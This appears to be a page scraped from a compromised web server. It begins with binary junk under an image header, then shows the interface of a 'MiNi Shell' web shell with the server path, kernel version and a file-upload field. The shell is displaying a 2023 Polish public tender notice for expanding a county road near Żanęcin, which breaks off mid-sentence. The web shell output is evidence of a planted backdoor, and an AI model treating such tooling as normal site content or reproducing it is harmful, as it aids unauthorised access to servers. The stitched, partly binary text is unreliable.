JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230418/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230418/0018033301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa drogi powiatowej Nr 2709W Żanęcin – Dziechciniec w miejscowości Żanęcin </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD DRÓG POWIATOWYCH W OTWOCKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 014848593</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bohaterów Westerplatte 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Karczew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-480</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdp@powiat-otwocki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zdpotwock.eb2b.com.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa drogi powiatowej Nr 2709W Żanęcin – Dziechciniec w miejscowości Żanęcin </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-53f19c4d-ddb7-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00180333</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00060167/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Rozbudowa drogi powiatowej Nr 2709W Żanęcin – Dziechciniec w miejscowości Żanęcin</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zdpotwock.eb2b.com.pl/edit-auction.html/391974 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">2. Komunikacja między zamawiającym a wykonawcami odbywa się wyłącznie przy<br/>użyciu środków komunikacji elektronicznej zgodnie z art. 61 ustawy, za pośrednictwem elektronicznej platformy zakupowej (dalej:<br/>„Platforma”) pod adresem: https://platforma.eb2b.com.pl lub https://xx.eb2b.com.pl, która spełnia wymagania opisane w art. 64<br/>ustawy.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na Platformie<br/>Zakupowej. Zarejestrowanie i utrzymywanie konta na Platformie Zakupowej oraz korzystanie z Platformy jest bezpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>korzystania z Platformy Zakupowej określa Regulamin Platformy Zakupowej (dostępny pod adresem internetowym<br/>https://platforma.eb2b.com.pl/user/terms lub https://xx.eb2b.com.pl/user/terms). Wykonawca przystępując do postępowania o<br/>udzielenie zamówienia publicznego tj. bezpłatnie rejestrując się lub logując (w przypadku posiadania konta w Platformie Zakupowej),<br/>akceptuje warunki korzystania z Platformy, określone w Regulaminie oraz uznaje go za wiążący.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>• administratorem Pani/Pana danych osobowych jest Zarząd Dróg Powiatowych w Otwocku z/s w Karczewie ul. Bohaterów<br/>Westerplatte 36, 05-480 Karczew tel. 22 780 64 21<br/>• inspektorem ochrony danych osobowych w Zarząd Dróg Powiatowych w Otwocku jest Pani Daria Bartnicka, email: iod@powiat-<br/>otwocki.pl ,<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego,<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1843),<br/>dalej „ustawa Pzp”; <br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp; <br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;<br/>• posiada Pani/Pan:<br/> na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/> na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/> na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO; <br/> prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>• nie przysługuje Pani/Panu:<br/> w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania<br/>ub uzupełnienia o których mowa w art 16 rozporządzenia 2016/679 , nie może skutkować zmiana wyniku postępowania o udzielenie<br/>zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art 18 ust 1 rozporządzenia 206/679, nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP/P-09/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie obejmuje rozbudowę drogi powiatowej Nr 2709W Żanęcin – Dziechciniec od km <br/>0+000 do km 1+169 gmina Wiązowna, powiat otwocki w zakresie budowy ścieżki pieszo – <br/>rowerowej, budowy odwodnienia, usunięcia kolizji z istniejącymi sieciami uzbrojenia <br/>terenu, budowy kanału technologicznego, budowy i przebudowy zjazdów indywidualnych <br/>i publicznych, usunięcia drzew oraz budowy dwóch przepustów <br/>2) W ramach zamówienia przewiduje się wykonanie następujących robót: <br/>a) Wykonanie robót rozbiórkowych polegających na rozebraniu: <br/>- nawierzchni bitumicznych około 500 m 2 <br/>- nawierzchni z kostki brukowej około 190 m 2 , <br/>- ogrodzeń wraz z bramą i furtką około 710 mb, <br/>- dwóch obiektów mostowych, <br/>b) Budowę ścieżki pieszo-rowerowej o szerokości 3 m <br/>c) Przebudowę i budowę zjazdów indywidualnych o nawierzchni bitumicznej z kostki <br/>betonowej o gr. 8 cm koloru czerwonego typu podwójne T (behaton), - zjazdy istniejące należy dostosować do szerokości bram, przy czym nie mogą posiadać <br/>szerokości jezdni większej niż szerokość jezdni drogi powiatowej, <br/>- zjazdy projektowane (nowe) będą posiadać szerokość jezdni przy zjazdach <br/>indywidualnych min. 3 m, zaś przy zjazdach publicznych min. 3,5 m wraz z <br/>obustronnymi poboczami, przy czym szerokość jezdni będzie nie większa niż szerokość <br/>jezdni drogi powiatowej <br/>- w rejonie zjazdów należy obniżyć krawężnik do poziomu jezdni <br/>d) Budowę odwodnienia nawierzchni jezdni i ścieżki pieszo – rowerowej będzie <br/>realizowane powierzchniowo za pomocą spadków podłużnych i poprzecznych do <br/>rowów oraz wpustami pod chodnikowymi do drenażu francuskiego – drenaż francuski <br/>wykonany pod ścieżką pieszo – rowerową, wypełniony kruszywem w geowłókninie. <br/>e) Wykonanie przepustów po drogą <br/>f) Poszerzenia nawierzchni jezdni oraz nowej nawierzchni jezdni na przebudowanym <br/>przepuście, <br/>g) Przebudowa sieci teletechnicznej, <br/>h) Przebudowa sieci elektroenergetycznej <br/>3) Szczegółowy opis przedmiotu zamówienia został określony w dokumentacji projektowej <br/>rozbudowy drogi powiatowej Nr 2709W Żanęcin – Dziechciniec od km 0+000 do km 1+169 <br/>gmina Wiązowna, powiat otwocki <br/>4) UWAGA: Wszystkie elementy BRD, które zostały wskazane w projekcie Stałej Organizacji <br/>Ruchu jako do przestawienia lub jako istniejące wymienić na nowe, <br/>5) UWAGA: na Wykonawcy spoczywa obowiązek zawarcia w imieniu Zamawiającego <br/>umów na usunięcie kolizji z gestorami sieci, <br/>6) UWAGA: Wykonawca ponosi wszystkie koszty związane z usunięciem kolizji i zawarciem <br/>umów na usunięcie kolizji z gestorami sieci, <br/>7) UWAGA: Wykonawca z imieniu Zamawiającego uzyska decyzję zezwalającą na <br/>użytkowanie, <br/>8) UWAGA: Zamawiający informuje, że w przypadku wystąpienia niesprzyjających <br/>warunków atmosferycznych tj. ciągłych opadów śniegu lub deszczu, niskich temperatur <br/>powietrza w okresie od 1 grudnia 2023 r. do 31 marca 2024 r. na wniosek Zamawiającego <br/>lub Inspektora roboty zostaną wstrzymane na czas niekorzystnych warunków <br/>atmosferycznych, a Wykonawca nie może rościć z tego tytułu żadnych roszczeń w <br/>szczególności przedłużenia terminu wykonania przedmiotu umowy. Wykonawca <br/>zobowiązany jest do zaplanowania prac biorąc pod uwagę powyższy okres tak aby <br/>przedmiot zamówienia został zrealizowany w terminie. <br/>9) UWAGA: WYKONAWCA ZOBOWIĄZANA JEST DO WYKONANIA W MIEJSCE <br/>ROZEBRANYCH OGRODZEŃ NOWYCH OGRODZEŃ W SYSTEMIE PANELOWYM lub <br/>przestawienie istniejących ogrodzeń oraz wykonawca jest zobowiązany do <br/>przestawienia istniejących bram i furtek <br/>10) Po przekazaniu terenu budowy Wykonawca bierze odpowiedzialność za jego prawidłowe <br/>zabezpieczenie co jest równoznaczne z prawidłowym jego zabezpieczeniem i utrzymaniem <br/>również w okresie zimowym oraz zabezpieczeniem rozpoczętych robót przed ich <br/>degradacją; <br/>11) Wykonawca przed wprowadzeniem organizacji ruchu zobowiązany jest do powiadomienia <br/>o tym fakcie powiatowego inżyniera ruchu, <br/>12) Prace należy prowadzić z zachowaniem odpowiednich przepisów i instrukcji <br/>bezpieczeństwa pracy przy wykonywaniu robót budowlanych, Wykonawca zobowiązany <br/>jest do opracowania, uzyskania stosownego zatwierdzenia oraz wprowadzenia Czasowej Organizacji Ruchu na czas budowy. Po zakończonych robotach Wykonawca wprowadzi <br/>stałą organizację ruchu <br/>13) Wykonawca zobowiązany jest do zagospodarowania we własnym zakresie materiałów <br/>pochodzących z rozbiórki, <br/>14) Wykonawca zobowiązany jest do umieszczenia tablicy informacyjnej przed realizacją <br/>inwestycji oraz po jej realizacji według wzoru określonego przez Zamawiającego, <br/>15) Po zakończonych robotach Wykonawca wykona dokumentację powykonawczą, w skład <br/>której wchodzić będą między innymi: <br/>− wyniki badań, <br/>− atesty, <br/>− deklaracje zgodności, <br/>− dokumentacja fotograficzna, <br/>− zawiadomienie o wprowadzeniu czasowej organizacji, <br/>− zawiadomienie o wprowadzeniu stałej organizacji ruchu, <br/>− dokumenty wskazane w dokumentacji projektowej jako wymagane do odbioru <br/>robót, <br/>− dokument potwierdzający fakt złożenia inwentaryzacji powykonawczej <br/>(Wykonawca po otrzymaniu geodezyjnej inwentaryzacji powykonawczej <br/>zobowiązany jest do dostarczenia oryginału do Zamawiającego) <br/>− oświadczenie kierowania budowy, <br/>− inne dokumenty wskazane przez Zamawiającego, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają <br/>wykluczeniu oraz spełniają warunki udziału w postępowaniu. <br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią warunki <br/>dotyczące: <br/>1) zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia <br/>warunku w powyższym zakresie, <br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub <br/>zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie stawia <br/>warunku w powyższym zakresie, <br/>3) sytuacji ekonomicznej i finansowej – Zamawiający nie stawia warunku w <br/>powyższym zakresie, <br/>4) zdolności technicznej i zawodowej: <br/>Zamawiający uzna za spełniony, jeżeli wykaże, że: <br/>\a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres <br/>prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, <br/>zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co najmniej <br/>1 zamówienie, które dotyczyło wykonania robót budowlanych polegających na <br/>przebudowie, rozbudowie lub budowie drogi publicznej minimum klasy Z w <br/>zakresie, którego było wykonanie chodnika lub ścieżki rowerowej lub ciągu <br/>pieszo-rowerowego na odcinku nie mniejszym niż 400 mb <br/> <br/>b) dysponuje następującymi osobami: <br/>- 1 osobą pełniącą funkcje kierownika robót, która posiada uprawnienia budowlane do <br/>kierowania robotami w specjalności drogowej bez ograniczeń lub odpowiadające im <br/>ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej <br/>obowiązujących przepisów - w zakresie wystarczającym do kierowania robotami w <br/>zakresie jw., należącą do właściwej izby samorządu zawodowego oraz posiadająca <br/>doświadczenie na stanowisku kierownika budowy lub kierownika robót drogowych na <br/>minimum jednym zadaniami polegającym na budowie, przebudowie lub rozbudowie <br/>drogi publicznej minimum klasy Z w zakresie którego było wykonanie chodnika <br/>lub ścieżki rowerowej lub ciągu pieszo-rowerowego na odcinku nie mniejszym niż <br/>400 mb <br/>- 1 osobą, która posiada uprawnienia budowlane do kierowania robotami w specjalności <br/>teletechnicznej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, <br/>które zostały wydane na podstawie wcześniej obowiązujących przepisów - w zakresie <br/>wystarczającym do kierowania robotami w zakresie jw., należącą do właściwej izby <br/>samorządu zawodowego oraz posiadająca doświadczenie <br/>- 1 osobą, która posiada uprawnienia budowlane do kierowania robotami w specjalności <br/>elektroenergetycznej bez ograniczeń lub odpowiadające im ważne uprawnienia <br/>budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów <br/>- w zakresie wystarczającym do kierowania robotami w zakresie jw., należącą do <br/>właściwej izby samorządu zawodowego oraz posiadająca doświadczenie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o którym mowa w art. 125 ust. 1 ustawy w zakresie art. 108 ust .1 pkt 1, 3, 4, 5 <br/>podstaw wykluczenia z postępowania oraz art. 7 ust. 1 Ustawy z dnia 13 <br/>kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania <br/>wspieraniu agresji na Ukrainę służących ochronie bezpieczeństwa narodowego</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich <br/>5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia <br/>działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, <br/>daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały <br/>wykonane, z załączeniem dowodów określających czy te roboty budowlane <br/>zostały wykonane należycie, w szczególności informacji o tym czy roboty <br/>zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo <br/>ukończone, przy czym dowodami, o których mowa, są referencje bądź inne <br/>dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były <br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze <br/>wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty - <br/>Zamawiający nie wymaga złożenia do oferty informacji o robotach <br/>budowlanych niewykonanych lub wykonanych nienależycie. Zamawiający <br/>wymaga wykazania tylko zamówień niezbędnych dla spełnienia warunku <br/>określonego w SIWZ <br/>b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia <br/>publicznego, w szczególności odpowiedzialnych za kierowanie robotami <br/>budowlanymi, wraz z informacjami na temat ich uprawnień, niezbędnych do <br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie 